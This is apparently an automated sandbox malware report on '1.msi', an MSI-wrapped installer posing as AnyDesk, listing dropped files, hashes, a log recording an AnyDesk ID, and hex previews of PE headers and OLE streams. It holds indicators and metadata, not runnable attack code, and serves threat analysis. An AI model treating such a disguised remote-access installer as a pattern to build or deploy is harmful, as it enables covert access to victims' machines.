                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............p...p...p.......p.....p..../.p.......p...q.%.p.......p.....p.....p.Rich..p.........................PE..L......`...........!.....h..........K....................................................@.........................P...]............P.......................`.....................................p...@...............t............................text....f.......h.................. ..`.rdata...............l..............@..@.data....5..........................@....rsrc........P......................@..@.reloc...)...`...*..................@..B........................................................................................................................................................................................................................................................................................................................

                                                                              C:\Windows\Installer\SourceHash{AC4583F8-6694-473E-BB77-32CDFC9BA940}

                                                                              Download File
                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                              Category:dropped
                                                                              Size (bytes):20480
                                                                              Entropy (8bit):1.160574548383438
                                                                              Encrypted:false
                                                                              SSDEEP:12:JSbX72FjEiAGiLIlHVRpgh/7777777777777777777777777vDHFv+eGB3Jpjl0G:JqiQI5o5+eOGF
                                                                              MD5:80A87B6E2D6888C84B8F90246E263EE4
                                                                              SHA1:ACB5270E5112C472F6D91B94322A8F3C8671EFB5
                                                                              SHA-256:1E86519BF9767892FC4ED05A712D90415E02B8C6B260E7556E5AF00174F0092F
                                                                              SHA-512:F98006A315B6FAA2C939A789E36EBA40860AEA58A95B845463B8B4C66B6E5C9A4978BFF4C034EB90169516B7E1F0EA458BA6CB8E68FE65148703580219D2761B
                                                                              Malicious:false
                                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Windows\Logs\DPX\setupact.log

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\expand.exe
                                                                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):969
                                                                              Entropy (8bit):4.316698873864823
                                                                              Encrypted:false
                                                                              SSDEEP:24:Y6mE76KbEE76KbE76KbEE76KbEE6mE6mE76KbEE76KbEE6r:YVE76KbEm6KbE76KbEm6KbE+EVE76KbY
                                                                              MD5:62DEA788F4FAC87F00521EB4D5BDE650
                                                                              SHA1:B1DE499D3485674F25810AD3B4EC35C2B79CE2B9
                                                                              SHA-256:7B341C7ED6AECCF2058AE39B62BF891D02664BC7399ED3F8B2FE0277E8E16BAA
                                                                              SHA-512:0A4AA1B760AAE3BABA90ACCA55075206794F55160B4096C1B61C4C653CD3930DACAFAC46E6E37CDA488E7BFF5797C6024D33C28B163362236DBDCB1EB0D2FB0E
                                                                              Malicious:false
                                                                              Preview:.2022-08-05 18:23:08, Info DPX Started DPX phase: Resume and Download Job..2022-08-05 18:23:08, Info DPX Started DPX phase: Apply Deltas Provided In File..2022-08-05 18:23:08, Info DPX Ended DPX phase: Apply Deltas Provided In File..2022-08-05 18:23:08, Info DPX Started DPX phase: Apply Deltas Provided In File..2022-08-05 18:23:08, Info DPX Ended DPX phase: Apply Deltas Provided In File..2022-08-05 18:23:08, Info DPX Ended DPX phase: Resume and Download Job..2022-08-05 18:23:08, Info DPX Started DPX phase: Resume and Download Job..2022-08-05 18:23:08, Info DPX Started DPX phase: Apply Deltas Provided In File..2022-08-05 18:23:08, Info DPX Ended DPX phase: Apply Deltas Provided In File..2022-08-05 18:23:08, Info DPX Ended DPX phase: Resume and Download Job..

                                                                              C:\Windows\SysWOW64\log1.txt

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):14
                                                                              Entropy (8bit):3.8073549220576055
                                                                              Encrypted:false
                                                                              SSDEEP:3:i1lfoN:i1lAN
                                                                              MD5:2451B91DDBC6BE55D3D1FF81E7269D71
                                                                              SHA1:70E56DBCB95AF007F3B08F86C0A22050991DDF02
                                                                              SHA-256:BF5EAAB0BE11F12556F4CEEB507DA91D8E5178BEE032C003A26070B5794774B4
                                                                              SHA-512:7B08E8E00CD20D78D84A9BA2D8C8B4E7C7804BA6D1013D886FE640A70394B1484AF2658C1A94D23EC0BCAA692E8651434BAE48B20B4A895BBB9FD3A438AEAD4F
                                                                              Malicious:false
                                                                              Preview:anydesk-ID:..0

                                                                              C:\programdata\anydesk.exe

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):3829888
                                                                              Entropy (8bit):7.999053982852042
                                                                              Encrypted:true
                                                                              SSDEEP:98304:nDFWG1bqjvcLIsoh5GbmkNC3dv2tthJ2/Ev6l3H:n7svcsImkN4chYECl3
                                                                              MD5:1BC5890C9E7BF54B7712E344B0AF9D04
                                                                              SHA1:78C9302C7A387A8D158F38D501784BE9B8B2716D
                                                                              SHA-256:AF61905129F377F5934B3BBF787E8D2417901858BB028F40F02200E985EE62F6
                                                                              SHA-512:7113888A8439AE5AF1B260C40229F7EBB98BDECE52EBAB0CE97137933AF4E9777D92D68166DBCF87A95CF88615452CAE7ECDF555B4785FFFE63C5783DBCB595D
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........h.}.;.}.;.}.;..";.}.;..#;.}.;...;.}.;...;.}.;Rich.}.;........................PE..L.....1b.........."......*....:..^...........@....@...................................:...@..........................................p..PH...........4:..<...........................................................................................text...5(.......*.................. ..`.itext...^...@...........................rdata..............................@..@.data.....9.......9..2..............@....rsrc...PH...p...J....9.............@..@.reloc...............0:.............@..B................................................................................................................................................................................................................................................................................................................

                                                                              Static File Info

                                                                              General

                                                                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Anydesk - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com 0.7.0.0, Subject: Anydesk - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com, Author: Anydesk, Keywords: Installer, Template: Intel;1033, Revision Number: {8CB27BF3-59BC-4419-BE15-E9E385453F27}, Create Time/Date: Thu Feb 18 21:32:30 2021, Last Saved Time/Date: Thu Feb 18 21:32:30 2021, Number of Pages: 200, Number of Words: 2, Name of Creating Application: MSI Wrapper (10.0.50.0), Security: 2
                                                                              Entropy (8bit):7.978539254164263
                                                                              TrID:
                                                                              • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                              File name:1.msi
                                                                              File size:4063232
                                                                              MD5:6cf5ad7a7d1b7bab0c62e246cf41a985
                                                                              SHA1:b06a03adc550ead96534f5e723395c4e16bfdf44
                                                                              SHA256:fb9f0bf2b71bf576053c56cb913ea4e93581fc9d3aa9d6d8a0ae572a1622f050
                                                                              SHA512:46cd8bd1ead75a8adb7d5bff81a2fdc04567d462e965664f6f9f796237839f07f74d2201c3da8f7f37c9dfc45749ed88708db5a216d84f7ac146e5af58a8608e
                                                                              SSDEEP:98304:pp+vXhd7YjjTcLO6KnQh5YUNa/ckQGQCWijuYAHw:+zkTciIYUNuNCAuPH
                                                                              TLSH:411633603AD8C537D2DA0636092E8BAA3A657D755F21C0DB2B587CBC5E317D3AC39342
                                                                              File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                              File Icon

                                                                              Icon Hash:a2a0b496b2caca72

                                                                              Static OLE Info

                                                                              General

                                                                              Document Type:OLE
                                                                              Number of OLE Files:1

                                                                              OLE File "1.msi"

                                                                              Indicators
                                                                              Has Summary Info:
                                                                              Application Name:MSI Wrapper (10.0.50.0)
                                                                              Encrypted Document:False
                                                                              Contains Word Document Stream:False
                                                                              Contains Workbook/Book Stream:False
                                                                              Contains PowerPoint Document Stream:False
                                                                              Contains Visio Document Stream:False
                                                                              Contains ObjectPool Stream:False
                                                                              Flash Objects Count:0
                                                                              Contains VBA Macros:False
                                                                              Summary
                                                                              Code Page:1252
                                                                              Title:Anydesk - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com 0.7.0.0
                                                                              Subject:Anydesk - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com
                                                                              Author:Anydesk
                                                                              Keywords:Installer
                                                                              Template:Intel;1033
                                                                              Revion Number:{8CB27BF3-59BC-4419-BE15-E9E385453F27}
                                                                              Create Time:2021-02-18 21:32:30
                                                                              Last Saved Time:2021-02-18 21:32:30
                                                                              Number of Pages:200
                                                                              Number of Words:2
                                                                              Creating Application:MSI Wrapper (10.0.50.0)
                                                                              Security:2
                                                                              Document Summary
                                                                              Document Code Page:1251
                                                                              Company:Anydesk

                                                                              Streams

                                                                              Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 120
                                                                              General
                                                                              Stream Path:\x5DocumentSummaryInformation
                                                                              File Type:data
                                                                              Stream Size:120
                                                                              Entropy:2.826912441242884
                                                                              Base64 Encoded:False
                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . H . . . . . . . . . . . ( . . . . . . 0 . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A n y d e s k .
                                                                              Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 48 00 00 00 03 00 00 00 01 00 00 00 28 00 00 00 00 00 00 80 30 00 00 00 0f 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 e3 04 00 00 13 00 00 00 19 04 00 00 1e 00 00 00 08 00 00 00 41 6e 79 64 65 73 6b 00
                                                                              Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 528
                                                                              General
                                                                              Stream Path:\x5SummaryInformation
                                                                              File Type:data
                                                                              Stream Size:528
                                                                              Entropy:4.752216684650982
                                                                              Base64 Encoded:True
                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . I n s t a l l e r . . . . . . . . . . . I n t e l ; 1 0 3 3 . . . . . . ' . . . { 8 C B 2 7 B F 3 - 5 9 B C - 4 4 1 9 - B E 1 5 - E 9 E 3 8 5 4 5 3 F 2 7 } . . @ . . . . k p = . . @ . .
                                                                              Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 e0 01 00 00 0d 00 00 00 01 00 00 00 78 00 00 00 02 00 00 00 18 01 00 00 03 00 00 00 70 01 00 00 04 00 00 00 08 01 00 00 05 00 00 00 80 00 00 00 07 00 00 00 94 00 00 00 09 00 00 00 a8 00 00 00 0c 00 00 00 d8 00 00 00 0d 00 00 00 e4 00 00 00
                                                                              Stream Path: \x17163\x16689\x18229\x16766\x18365\x17760\x17636\x16947\x16167\x17896\x17656\x17753\x17074\x16693\x18480, File Type: Microsoft Cabinet archive data, 3811024 bytes, 1 file, Stream Size: 3811024
                                                                              General
                                                                              Stream Path:\x17163\x16689\x18229\x16766\x18365\x17760\x17636\x16947\x16167\x17896\x17656\x17753\x17074\x16693\x18480
                                                                              File Type:Microsoft Cabinet archive data, 3811024 bytes, 1 file
                                                                              Stream Size:3811024
                                                                              Entropy:7.999935868582085
                                                                              Base64 Encoded:True
                                                                              Data ASCII:M S C F . . . . & : . . . . . , . . . . . . . . . . . . . . . ~ . . H . . . v . . . . : . . . . . . . T p . i n s t a l l . e x e . . W . [ . . H . . " T # . . m . U e p . n I : . . . h < d . r ) R * + . - [ y / c 1 . x w > . " T I 1 [ ( . . . . 5 . H . . . F j . . . } } K . . O . % . o " . P j / M 2 I o t . . B / Z B k . . . . 8 . , j A r I ` r r I # ) R . . 5 ? I h . . . . . . . C L S f P $ . $ H D 4 . i q 6 . 4 . . k q . . . . . # . * . ! X . . + . C . . - p - . ' . . O d l Y E . ! . A ' . q Y % l . .
                                                                              Data Raw:4d 53 43 46 00 00 00 00 d0 26 3a 00 00 00 00 00 2c 00 00 00 00 00 00 00 03 01 01 00 01 00 00 00 7e ea 00 00 48 00 00 00 76 00 03 12 00 8e 3a 00 00 00 00 00 00 00 c6 54 d7 70 20 00 69 6e 73 74 61 6c 6c 2e 65 78 65 00 b8 ea a5 05 d4 57 00 80 5b 80 80 8d 04 10 48 a9 07 00 22 54 80 23 00 00 6d 00 fe b7 55 ab 65 97 99 70 b9 1b 6e c9 49 3a 09 12 9d 11 68 3c 64 19 72 29 52 cb 2a 2b 1a 2d
                                                                              Stream Path: \x17163\x16689\x18229\x16766\x18365\x17932\x17910\x17458\x16778\x17207\x17522\x17357\x18479, File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, Stream Size: 212992
                                                                              General
                                                                              Stream Path:\x17163\x16689\x18229\x16766\x18365\x17932\x17910\x17458\x16778\x17207\x17522\x17357\x18479
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Stream Size:212992
                                                                              Entropy:6.513444216841171
                                                                              Base64 Encoded:True
                                                                              Data ASCII:M Z . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . L ! T h i s p r o g r a m c a n n o t b e r u n i n D O S m o d e . . . . $ . . . . . . . . p p p p . p / p . . p q % p p . p . p R i c h p . . . . . . . . . . . . . . . . . . . . . . . . P E . . L . . . . ` . . . . . . . . . . ! . . . . . h . . . . . . . . . K . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . .
                                                                              Data Raw:4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00
                                                                              Stream Path: \x18496\x15167\x17394\x17464\x17841, File Type: data, Stream Size: 672
                                                                              General
                                                                              Stream Path:\x18496\x15167\x17394\x17464\x17841
                                                                              File Type:data
                                                                              Stream Size:672
                                                                              Entropy:4.764474142026
                                                                              Base64 Encoded:False
                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . " . " . " . ) . ) . ) . * . * . * . + . + . / . / . / . / . / . / . 5 . 5 . 5 . = . = . = . = . = . M . M . M . M . M . M . M . M . \\ . \\ . a . a . a . a . a . a . a . a . o . o . r . r . r . s . s . s . t . t . w . w . w . w . w . w . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                              Data Raw:06 00 06 00 06 00 06 00 06 00 06 00 06 00 06 00 06 00 06 00 22 00 22 00 22 00 29 00 29 00 29 00 2a 00 2a 00 2a 00 2b 00 2b 00 2f 00 2f 00 2f 00 2f 00 2f 00 2f 00 35 00 35 00 35 00 3d 00 3d 00 3d 00 3d 00 3d 00 4d 00 4d 00 4d 00 4d 00 4d 00 4d 00 4d 00 4d 00 5c 00 5c 00 61 00 61 00 61 00 61 00 61 00 61 00 61 00 61 00 6f 00 6f 00 72 00 72 00 72 00 73 00 73 00 73 00 74 00 74 00 77 00
                                                                              Stream Path: \x18496\x16191\x17783\x17516\x15210\x17892\x18468, File Type: ASCII text, with very long lines, with no line terminators, Stream Size: 8546
                                                                              General
                                                                              Stream Path:\x18496\x16191\x17783\x17516\x15210\x17892\x18468
                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                              Stream Size:8546
                                                                              Entropy:5.082724064913251
                                                                              Base64 Encoded:True
                                                                              Data ASCII:N a m e T a b l e T y p e C o l u m n _ V a l i d a t i o n V a l u e N P r o p e r t y I d _ S u m m a r y I n f o r m a t i o n D e s c r i p t i o n S e t C a t e g o r y K e y C o l u m n M a x V a l u e N u l l a b l e K e y T a b l e M i n V a l u e I d e n t i f i e r N a m e o f t a b l e N a m e o f c o l u m n Y ; N W h e t h e r t h e c o l u m n i s n u l l a b l e Y M i n i m u m v a l u e a l l o w e d M a x i m u m v a l u e a l l o w e d F o r f o r e i g n k e y
                                                                              Data Raw:4e 61 6d 65 54 61 62 6c 65 54 79 70 65 43 6f 6c 75 6d 6e 5f 56 61 6c 69 64 61 74 69 6f 6e 56 61 6c 75 65 4e 50 72 6f 70 65 72 74 79 49 64 5f 53 75 6d 6d 61 72 79 49 6e 66 6f 72 6d 61 74 69 6f 6e 44 65 73 63 72 69 70 74 69 6f 6e 53 65 74 43 61 74 65 67 6f 72 79 4b 65 79 43 6f 6c 75 6d 6e 4d 61 78 56 61 6c 75 65 4e 75 6c 6c 61 62 6c 65 4b 65 79 54 61 62 6c 65 4d 69 6e 56 61 6c 75 65
                                                                              Stream Path: \x18496\x16191\x17783\x17516\x15978\x17586\x18479, File Type: data, Stream Size: 1216
                                                                              General
                                                                              Stream Path:\x18496\x16191\x17783\x17516\x15978\x17586\x18479
                                                                              File Type:data
                                                                              Stream Size:1216
                                                                              Entropy:3.1068972075441508
                                                                              Base64 Encoded:False
                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . . . . . . . . . 6 . . . $ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . B . . . . . . . . . . . . . . o . . . . . . . . . . . . . . . ' . . . . . . . . . . . . . . . ; . . . . . . . . . . . > . . . . . . . . . . . . . . . . . . ' . . . . . . . . . . . . . . . . . . . . . S . . . ^ . . . . . . . .
                                                                              Data Raw:00 00 00 00 04 00 06 00 05 00 02 00 00 00 00 00 04 00 02 00 06 00 02 00 0b 00 15 00 05 00 05 00 01 00 2c 00 0a 00 01 00 13 00 02 00 0b 00 06 00 03 00 02 00 08 00 02 00 09 00 02 00 08 00 02 00 08 00 02 00 08 00 02 00 08 00 02 00 0a 00 19 00 0d 00 01 00 0e 00 01 00 03 00 01 00 1e 00 01 00 01 00 2a 00 15 00 01 00 15 00 01 00 36 00 01 00 24 00 01 00 f5 00 01 00 0f 00 01 00 04 00 09 00
                                                                              Stream Path: \x18496\x16255\x16740\x16943\x18486, File Type: data, Stream Size: 38
                                                                              General
                                                                              Stream Path:\x18496\x16255\x16740\x16943\x18486
                                                                              File Type:data
                                                                              Stream Size:38
                                                                              Entropy:3.123963756721792
                                                                              Base64 Encoded:False
                                                                              Data ASCII:. . " . ) . * . + . / . 5 . = . M . \\ . a . o . r . s . t . w . . . .
                                                                              Data Raw:06 00 22 00 29 00 2a 00 2b 00 2f 00 35 00 3d 00 4d 00 5c 00 61 00 6f 00 72 00 73 00 74 00 77 00 82 00 86 00 90 00
                                                                              Stream Path: \x18496\x16383\x17380\x16876\x17892\x17580\x18481, File Type: data, Stream Size: 2064
                                                                              General
                                                                              Stream Path:\x18496\x16383\x17380\x16876\x17892\x17580\x18481
                                                                              File Type:data
                                                                              Stream Size:2064
                                                                              Entropy:2.381269221109181
                                                                              Base64 Encoded:False
                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . " . " . " . ) . ) . ) . * . * . * . + . + . / . / . / . / . / . / . 5 . 5 . 5 . = . = . = . = . = . M . M . M . M . M . M . M . M . \\ . \\ . a . a . a . a . a . a . a . a . o . o . r . r . r . s . s . s . t . t . w . w . w . w . w . w . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . % . ' . # . % . ' . # . % . ' . . . - . % . / . 1 . 4 . 7 . : . 5 . I . K . . . # . @ . C . F . . . 4 . 7 . M . O . Q . T . V . ] . _ . ' . 7 . _
                                                                              Data Raw:06 00 06 00 06 00 06 00 06 00 06 00 06 00 06 00 06 00 06 00 0a 00 0a 00 22 00 22 00 22 00 29 00 29 00 29 00 2a 00 2a 00 2a 00 2b 00 2b 00 2f 00 2f 00 2f 00 2f 00 2f 00 2f 00 35 00 35 00 35 00 3d 00 3d 00 3d 00 3d 00 3d 00 4d 00 4d 00 4d 00 4d 00 4d 00 4d 00 4d 00 4d 00 5c 00 5c 00 61 00 61 00 61 00 61 00 61 00 61 00 61 00 61 00 6f 00 6f 00 72 00 72 00 72 00 73 00 73 00 73 00 74 00
                                                                              Stream Path: \x18496\x16661\x17528\x17126\x17548\x16881\x17900\x17580\x18481, File Type: data, Stream Size: 4
                                                                              General
                                                                              Stream Path:\x18496\x16661\x17528\x17126\x17548\x16881\x17900\x17580\x18481
                                                                              File Type:data
                                                                              Stream Size:4
                                                                              Entropy:1.5
                                                                              Base64 Encoded:False
                                                                              Data ASCII:. .
                                                                              Data Raw:e1 00 e2 00
                                                                              Stream Path: \x18496\x16842\x17200\x15281\x16955\x17958\x16951\x16924\x17972\x17512\x16934, File Type: data, Stream Size: 48
                                                                              General
                                                                              Stream Path:\x18496\x16842\x17200\x15281\x16955\x17958\x16951\x16924\x17972\x17512\x16934
                                                                              File Type:data
                                                                              Stream Size:48
                                                                              Entropy:3.0684210940655055
                                                                              Base64 Encoded:False
                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . x . < .
                                                                              Data Raw:9d 00 9e 00 9f 00 a0 00 a1 00 a2 00 a3 00 a4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 83 84 83 e8 83 78 85 dc 85 3c 8f a0 8f c8 99
                                                                              Stream Path: \x18496\x16842\x17200\x16305\x16146\x17704\x16952\x16817\x18472, File Type: data, Stream Size: 24
                                                                              General
                                                                              Stream Path:\x18496\x16842\x17200\x16305\x16146\x17704\x16952\x16817\x18472
                                                                              File Type:data
                                                                              Stream Size:24
                                                                              Entropy:2.594360937770434
                                                                              Base64 Encoded:False
                                                                              Data ASCII:. . . . . . . . . . . . .
                                                                              Data Raw:9d 00 9e 00 9f 00 a5 00 00 00 00 00 00 00 00 00 20 83 84 83 e8 83 14 85
                                                                              Stream Path: \x18496\x16842\x17913\x18126\x16808\x17912\x16168\x17704\x16952\x16817\x18472, File Type: data, Stream Size: 42
                                                                              General
                                                                              Stream Path:\x18496\x16842\x17913\x18126\x16808\x17912\x16168\x17704\x16952\x16817\x18472
                                                                              File Type:data
                                                                              Stream Size:42
                                                                              Entropy:2.9135675273020816
                                                                              Base64 Encoded:False
                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . x . . .
                                                                              Data Raw:9d 00 9f 00 a0 00 a1 00 a4 00 a6 00 a7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 83 e8 83 78 85 dc 85 c8 99 9c 98 00 99
                                                                              Stream Path: \x18496\x16911\x17892\x17784\x15144\x17458\x17587\x16945\x17905\x18486, File Type: data, Stream Size: 4
                                                                              General
                                                                              Stream Path:\x18496\x16911\x17892\x17784\x15144\x17458\x17587\x16945\x17905\x18486
                                                                              File Type:data
                                                                              Stream Size:4
                                                                              Entropy:1.5
                                                                              Base64 Encoded:False
                                                                              Data ASCII:. .
                                                                              Data Raw:cc 00 aa 00
                                                                              Stream Path: \x18496\x16911\x17892\x17784\x18472, File Type: 386 compact demand paged pure executable, Stream Size: 16
                                                                              General
                                                                              Stream Path:\x18496\x16911\x17892\x17784\x18472
                                                                              File Type:386 compact demand paged pure executable
                                                                              Stream Size:16
                                                                              Entropy:1.9197367178034825
                                                                              Base64 Encoded:False
                                                                              Data ASCII:. . . . . . . . . . .
                                                                              Data Raw:cc 00 00 00 cd 00 00 00 02 80 01 80 00 00 00 80
                                                                              Stream Path: \x18496\x16918\x17191\x18468, File Type: MIPSEB Ucode, Stream Size: 14
                                                                              General
                                                                              Stream Path:\x18496\x16918\x17191\x18468
                                                                              File Type:MIPSEB Ucode
                                                                              Stream Size:14
                                                                              Entropy:0.946372935985442
                                                                              Base64 Encoded:False
                                                                              Data ASCII:. . . . . . . . . . . .
                                                                              Data Raw:01 80 00 00 00 80 00 00 00 00 00 00 00 00
                                                                              Stream Path: \x18496\x16923\x17194\x17910\x18229, File Type: data, Stream Size: 60
                                                                              General
                                                                              Stream Path:\x18496\x16923\x17194\x17910\x18229
                                                                              File Type:data
                                                                              Stream Size:60
                                                                              Entropy:3.5292412679834797
                                                                              Base64 Encoded:False
                                                                              Data ASCII:. . . " . % . ( . . . . . . . . . . . . . . . . . . . # . & . ) . . . ! . $ . ' . * . . . . . .
                                                                              Data Raw:ad 00 1f 01 22 01 25 01 28 01 ff 7f ff 7f ff 7f ff 7f ff 7f 1c 01 1c 01 1c 01 1c 01 1c 01 1d 01 20 01 23 01 26 01 29 01 1e 01 21 01 24 01 27 01 2a 01 aa 00 aa 00 aa 00 aa 00 aa 00
                                                                              Stream Path: \x18496\x17163\x16689\x18229, File Type: data, Stream Size: 8
                                                                              General
                                                                              Stream Path:\x18496\x17163\x16689\x18229
                                                                              File Type:data
                                                                              Stream Size:8
                                                                              Entropy:1.75
                                                                              Base64 Encoded:False
                                                                              Data ASCII:. . . . . .
                                                                              Data Raw:a8 00 a9 00 01 00 01 00
                                                                              Stream Path: \x18496\x17165\x16949\x17894\x17778\x18492, File Type: data, Stream Size: 18
                                                                              General
                                                                              Stream Path:\x18496\x17165\x16949\x17894\x17778\x18492
                                                                              File Type:data
                                                                              Stream Size:18
                                                                              Entropy:2.102187170949333
                                                                              Base64 Encoded:False
                                                                              Data ASCII:. . . . . . . . . .
                                                                              Data Raw:ac 00 c7 00 c9 00 c7 00 c9 00 00 00 c8 00 ca 00 cb 00
                                                                              Stream Path: \x18496\x17490\x17910\x17380\x15279\x16955\x17958\x16951\x16924\x17972\x17512\x16934, File Type: data, Stream Size: 216
                                                                              General
                                                                              Stream Path:\x18496\x17490\x17910\x17380\x15279\x16955\x17958\x16951\x16924\x17972\x17512\x16934
                                                                              File Type:data
                                                                              Stream Size:216
                                                                              Entropy:4.294855551942891
                                                                              Base64 Encoded:False
                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . d @ . ( p . ! y .
                                                                              Data Raw:9d 00 9e 00 9f 00 a0 00 a1 00 a3 00 a4 00 a6 00 a7 00 ae 00 b0 00 b1 00 b4 00 b6 00 b7 00 b9 00 ba 00 bb 00 bd 00 bf 00 c0 00 c2 00 c3 00 cf 00 d0 00 d1 00 d2 00 d3 00 d4 00 d5 00 d6 00 d7 00 d8 00 d9 00 db 00 df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 dc 00 dc 00 dc 00 de 00 de 00 de 00 de 00 de 00 da 00 dd 00 dd 00 dd 00 dd 00 dd 00 00 00 00 00 00 00 00 00 00 00
                                                                              Stream Path: \x18496\x17490\x17910\x17380\x16303\x16146\x17704\x16952\x16817\x18472, File Type: data, Stream Size: 48
                                                                              General
                                                                              Stream Path:\x18496\x17490\x17910\x17380\x16303\x16146\x17704\x16952\x16817\x18472
                                                                              File Type:data
                                                                              Stream Size:48
                                                                              Entropy:3.110087760732172
                                                                              Base64 Encoded:False
                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . d
                                                                              Data Raw:9d 00 9e 00 9f 00 a5 00 cf 00 d0 00 d1 00 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 83 84 83 e8 83 14 85 19 80 64 80 bc 82 b0 84
                                                                              Stream Path: \x18496\x17548\x17648\x17522\x17512\x18487, File Type: Dyalog APL aplcore version 171.0, Stream Size: 12
                                                                              General
                                                                              Stream Path:\x18496\x17548\x17648\x17522\x17512\x18487
                                                                              File Type:Dyalog APL aplcore version 171.0
                                                                              Stream Size:12
                                                                              Entropy:2.292481250360578
                                                                              Base64 Encoded:False
                                                                              Data ASCII:. . . . . . .
                                                                              Data Raw:aa 00 ab 00 ac 00 04 80 00 00 ad 00
                                                                              Stream Path: \x18496\x17630\x17770\x16868\x18472, File Type: data, Stream Size: 32
                                                                              General
                                                                              Stream Path:\x18496\x17630\x17770\x16868\x18472
                                                                              File Type:data
                                                                              Stream Size:32
                                                                              Entropy:2.198391110799899
                                                                              Base64 Encoded:False
                                                                              Data ASCII:/ . / . . . - . - . . . . . . . . . . . . . . . . . . . . .
                                                                              Data Raw:2f 01 2f 01 00 00 2d 01 2d 01 00 00 00 00 00 00 01 00 00 80 02 00 00 80 00 00 00 00 19 01 18 01
                                                                              Stream Path: \x18496\x17753\x17650\x17768\x18231, File Type: data, Stream Size: 88
                                                                              General
                                                                              Stream Path:\x18496\x17753\x17650\x17768\x18231
                                                                              File Type:data
                                                                              Stream Size:88
                                                                              Entropy:3.9470457308545095
                                                                              Base64 Encoded:False
                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . / . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . .
